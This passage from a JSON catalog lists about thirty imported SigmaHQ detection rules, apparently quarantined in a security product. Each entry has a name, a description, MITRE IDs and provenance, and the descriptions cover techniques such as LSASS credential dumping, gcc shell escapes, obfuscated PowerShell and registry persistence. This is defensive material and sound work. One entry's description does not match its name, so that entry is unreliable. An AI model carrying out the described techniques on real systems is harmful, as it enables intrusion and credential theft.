"T1528" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/end-user-consent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b2cc4c4-2ad4-416d-8e8e-ee6aa6f5035a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/cloud/azure/audit_logs/azure_app_end_user_consent.yml" } }, { "id": "sigmahq-sigma-9b5de532-a757-4d70-946c-1f3e44f48b4d", "type": "detection", "name": "Shell Execution GCC - Linux", "description": "Detects the use of the \"gcc\" utility to execute a shell. Such behavior may be associated with privilege escalation, unauthorized command execution, or to break out from restricted environments.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1083" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/shell-execution-gcc-linux.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b5de532-a757-4d70-946c-1f3e44f48b4d", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_gcc_shell_execution.yml" } }, { "id": "sigmahq-sigma-9b64de98-9db3-4033-bd7a-f51430105f00", "type": "detection", "name": "Windows Terminal Profile Settings Modification By Uncommon Process", "description": "Detects the creation or modification of the Windows Terminal Profile settings file \"settings.json\" by an uncommon process.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1547.015" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/windows-terminal-profile-settings-modification-by-uncommon-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b64de98-9db3-4033-bd7a-f51430105f00", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/file/file_event/file_event_win_susp_windows_terminal_profile.yml" } }, { "id": "sigmahq-sigma-9b72b82d-f1c5-4632-b589-187159bc6ec1", "type": "detection", "name": "CodeIntegrity - Blocked Driver Load With Revoked Certificate", "description": "Detects blocked load attempts of revoked drivers", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1543" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/codeintegrity-blocked-driver-load-with-revoked-certificate.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b72b82d-f1c5-4632-b589-187159bc6ec1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/code_integrity/win_codeintegrity_revoked_driver_blocked.yml" } }, { "id": "sigmahq-sigma-9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "type": "detection", "name": "Invoke-Obfuscation Via Use MSHTA - Security", "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-use-mshta-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9b8d9203-4e0f-4cd9-bb06-4cc4ea6d0e9a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_invoke_obfuscation_via_use_mshta_services_security.yml" } }, { "id": "sigmahq-sigma-9bd012ee-0dff-44d7-84a0-aa698cfd87a3", "type": "detection", "name": "LSASS Memory Access by Tool With Dump Keyword In Name", "description": "Detects LSASS process access requests from a source process with the \"dump\" keyword in its image name.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1003.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/lsass-memory-access-by-tool-with-dump-keyword-in-name.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9bd012ee-0dff-44d7-84a0-aa698cfd87a3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_access/proc_access_win_lsass_dump_keyword_image.yml" } }, { "id": "sigmahq-sigma-9bd04a79-dabe-4f1f-a5ff-92430265c96b", "type": "detection", "name": "Privilege Escalation via Named Pipe Impersonation", "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/privilege-escalation-via-named-pipe-impersonation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml" } }, { "id": "sigmahq-sigma-9c0295ce-d60d-40bd-bd74-84673b7592b1", "type": "detection", "name": "Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call", "description": "Detects suspicious base64 encoded and obfuscated \"LOAD\" keyword used in .NET \"reflection.assembly\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1059.001", "T1027" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-encoded-and-obfuscated-reflection-assembly-load-function-call.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9c0295ce-d60d-40bd-bd74-84673b7592b1", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml" } }, { "id": "sigmahq-sigma-9c14c9fa-1a63-4a64-8e57-d19280559490", "type": "detection", "name": "Invoke-Obfuscation Via Stdin", "description": "Detects Obfuscated Powershell via Stdin in Scripts", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1027", "T1059.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/invoke-obfuscation-via-stdin.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9c14c9fa-1a63-4a64-8e57-d19280559490", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml" } }, { "id": "sigmahq-sigma-9c226817-8dc9-46c2-a58d-66655aafd7dc", "type": "detection", "name": "Modify User Shell Folders Startup Value", "description": "Detect modification of the User Shell Folders registry values for Startup or Common Startup which could indicate persistence attempts.\nAttackers may modify User Shell Folders registry keys to point to malicious executables or scripts that will be executed during startup.\nThis technique is often used to maintain persistence on a compromised system by ensuring that the malicious payload is executed automatically.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/modify-user-shell-folders-startup-value.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9c226817-8dc9-46c2-a58d-66655aafd7dc", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_susp_user_shell_folders.yml" } }, { "id": "sigmahq-sigma-9c5037d1-c568-49b3-88c7-9846a5bdc2be", "type": "detection", "name": "Suspicious Run Key from Download", "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1547.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-run-key-from-download.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_event/registry_event_susp_download_run_key.yml" } }, { "id": "sigmahq-sigma-9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", "type": "detection", "name": "Uncommon Child Process Of Appvlp.EXE", "description": "Detects uncommon child processes of Appvlp.EXE\nAppvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse \"AppVLP\" to execute shell commands.\nNormally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder\nor to mark a file as a system file.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-child-process-of-appvlp-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9c7e131a-0f2c-4ae0-9d43-b04f4e266d43", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_appvlp_uncommon_child_process.yml" } }, { "id": "sigmahq-sigma-9c8acf1a-cbf9-4db6-b63c-74baabe03e59", "type": "detection", "name": "NTLM Brute Force", "description": "Detects common NTLM brute force device names", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1110" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/ntlm-brute-force.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9c8acf1a-cbf9-4db6-b63c-74baabe03e59", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/ntlm/win_susp_ntlm_brute_force.yml" } }, { "id": "sigmahq-sigma-9c8afa4d-0022-48f0-9456-3712466f9701", "type": "detection", "name": "Tap Driver Installation - Security", "description": "Detects the installation of a well-known TAP driver service. This could be a sign of potential preparation for data exfiltration using tunnelling techniques.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [ "T1048" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/tap-driver-installation-security.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9c8afa4d-0022-48f0-9456-3712466f9701", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/security/win_security_tap_driver_installation.yml" } }, { "id": "sigmahq-sigma-9c8c7000-3065-44a8-a555-79bcba5d9955", "type": "detection", "name": "MSDT Execution Via Answer File", "description": "Detects execution of \"msdt.exe\" using an answer file which is simulating the legitimate way of calling msdt via \"pcwrun.exe\" (For example from the compatibility tab).", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/msdt-execution-via-answer-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9c8c7000-3065-44a8-a555-79bcba5d9955", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_msdt_answer_file_exec.yml" } }, { "id": "sigmahq-sigma-9ca2bf31-0570-44d8-a543-534c47c33ed7", "type": "detection", "name": "Potential DLL Sideloading Of DBGCORE.DLL", "description": "Detects DLL sideloading of \"dbgcore.dll\"", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-dll-sideloading-of-dbgcore-dll.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ca2bf31-0570-44d8-a543-534c47c33ed7", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/image_load/image_load_side_load_dbgcore.yml" } }, { "id": "sigmahq-sigma-9cc85849-3b02-4cb5-b371-3a1ff54f2218", "type": "detection", "name": "File Download From IP URL Via Curl.EXE", "description": "Detects file downloads directly from IP address URL using curl.exe", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/file-download-from-ip-url-via-curl-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9cc85849-3b02-4cb5-b371-3a1ff54f2218", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_curl_download_direct_ip_exec.yml" } }, { "id": "sigmahq-sigma-9ccba514-7cb6-4c5c-b377-700758f2f120", "type": "detection", "name": "Suspicious Child Process of AspNetCompiler", "description": "Detects potentially suspicious child processes of \"aspnet_compiler.exe\".", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1127" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-child-process-of-aspnetcompiler.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9ccba514-7cb6-4c5c-b377-700758f2f120", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_aspnet_compiler_susp_child_process.yml" } }, { "id": "sigmahq-sigma-9cfc00b6-bfb7-49ce-9781-ef78503154bb", "type": "detection", "name": "Wlrmdr.EXE Uncommon Argument Or Child Process", "description": "Detects the execution of \"Wlrmdr.exe\" with the \"-u\" command line flag which allows anything passed to it to be an argument of the ShellExecute API, which would allow an attacker to execute arbitrary binaries.\nThis detection also focuses on any uncommon child processes spawned from \"Wlrmdr.exe\" as a supplement for those that posses \"ParentImage\" telemetry.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/wlrmdr-exe-uncommon-argument-or-child-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9cfc00b6-bfb7-49ce-9781-ef78503154bb", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wlrmdr_uncommon_child_process.yml" } }, { "id": "sigmahq-sigma-9cfe4b27-1e56-48b4-b7a8-d46851c91a44", "type": "detection", "name": "MMC Executing Files with Reversed Extensions Using RTLO Abuse", "description": "Detects malicious behavior where the MMC utility (`mmc.exe`) executes files with reversed extensions caused by Right-to-Left Override (RLO) abuse, disguising them as document formats.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1204.002", "T1218.014", "T1036.002" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/mmc-executing-files-with-reversed-extensions-using-rtlo-abuse.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9cfe4b27-1e56-48b4-b7a8-d46851c91a44", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_mmc_rlo_abuse_pattern.yml" } }, { "id": "sigmahq-sigma-9d15044a-7cfe-4d23-8085-6ebc11df7685", "type": "detection", "name": "Potential Persistence Via Visual Studio Tools for Office", "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1137.006" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/potential-persistence-via-visual-studio-tools-for-office.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_persistence_office_vsto.yml" } }, { "id": "sigmahq-sigma-9d3436ef-9476-4c43-acca-90ce06bdf33a", "type": "detection", "name": "DHCP Callout DLL Installation", "description": "Detects the installation of a Callout DLL via CalloutDlls and CalloutEnabled parameter in Registry, which can be used to execute code in context of the DHCP server (restart required)", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1574.001", "T1112" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/dhcp-callout-dll-installation.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9d3436ef-9476-4c43-acca-90ce06bdf33a", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_dhcp_calloutdll.yml" } }, { "id": "sigmahq-sigma-9d4548fa-bba0-4e88-bd66-5d5bf516cda0", "type": "detection", "name": "Masquerading as Linux Crond Process", "description": "Masquerading occurs when the name or location of an executable, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation.\nSeveral different variations of this technique have been observed.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1036.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/masquerading-as-linux-crond-process.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9d4548fa-bba0-4e88-bd66-5d5bf516cda0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/auditd/execve/lnx_auditd_masquerading_crond.yml" } }, { "id": "sigmahq-sigma-9d5a1274-922a-49d0-87f3-8c653483b909", "type": "detection", "name": "Uncommon System Information Discovery Via Wmic.EXE", "description": "Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1082" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/uncommon-system-information-discovery-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9d5a1274-922a-49d0-87f3-8c653483b909", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_system_info_uncommon.yml" } }, { "id": "sigmahq-sigma-9d779ce8-5256-4b13-8b6f-b91c602b43f4", "type": "detection", "name": "Named Pipe Created Via Mkfifo", "description": "Detects the creation of a new named pipe using the \"mkfifo\" utility", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "low", "category": "_quarantine", "mitre_techniques": [], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/named-pipe-created-via-mkfifo.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9d779ce8-5256-4b13-8b6f-b91c602b43f4", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/linux/process_creation/proc_creation_lnx_mkfifo_named_pipe_creation.yml" } }, { "id": "sigmahq-sigma-9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", "type": "detection", "name": "Computer System Reconnaissance Via Wmic.EXE", "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model, etc.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1047" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/computer-system-reconnaissance-via-wmic-exe.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_wmic_recon_computersystem.yml" } }, { "id": "sigmahq-sigma-9d8f9bb8-01af-4e15-a3a2-349071530530", "type": "detection", "name": "Suspicious Path In Keyboard Layout IME File Registry Value", "description": "Detects usage of Windows Input Method Editor (IME) keyboard layout feature, which allows an attacker to load a DLL into the process after sending the WM_INPUTLANGCHANGEREQUEST message.\nBefore doing this, the client needs to register the DLL in a special registry key that is assumed to implement this keyboard layout. This registry key should store a value named \"Ime File\" with a DLL path.\nIMEs are essential for languages that have more characters than can be represented on a standard keyboard, such as Chinese, Japanese, and Korean.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1685" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/suspicious-path-in-keyboard-layout-ime-file-registry-value.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9d8f9bb8-01af-4e15-a3a2-349071530530", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/registry/registry_set/registry_set_ime_suspicious_paths.yml" } }, { "id": "sigmahq-sigma-9db37458-4df2-46a5-95ab-307e7f29e675", "type": "detection", "name": "Exchange Set OabVirtualDirectory ExternalUrl Property", "description": "Rule to detect an adversary setting OabVirtualDirectory External URL property to a script in Exchange Management log", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/exchange-set-oabvirtualdirectory-externalurl-property.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9db37458-4df2-46a5-95ab-307e7f29e675", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/builtin/msexchange/win_exchange_set_oabvirtualdirectory_externalurl.yml" } }, { "id": "sigmahq-sigma-9db5446c-b44a-4291-8b89-fcab5609c3b3", "type": "detection", "name": "OpenCanary - VNC Connection Attempt", "description": "Detects instances where a VNC service on an OpenCanary node has had a connection attempt.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "high", "category": "_quarantine", "mitre_techniques": [ "T1021" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/opencanary-vnc-connection-attempt.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9db5446c-b44a-4291-8b89-fcab5609c3b3", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/application/opencanary/opencanary_vnc_connection_attempt.yml" } }, { "id": "sigmahq-sigma-9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", "type": "detection", "name": "Remote Code Execute via Winrm.vbs", "description": "Detects an attempt to execute code or create service on remote host via winrm.vbs.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1216" ], "log_source": null, "playbook": null, "verified": false, "source": "sigmahq", "tier": "imported", "enabled": false, "path": "detections/sigma-imports/_quarantine/remote-code-execute-via-winrm-vbs.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "SigmaHQ/sigma", "source_id": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", "source_commit": "df5c6a6", "license": "DRL-1.1", "license_url": "https://github.com/SigmaHQ/Detection-Rule-License", "imported_at": "2026-05-04", "upstream_path": "rules/windows/process_creation/proc_creation_win_winrm_execution_via_scripting_api_winrm_vbs.yml" } }, { "id": 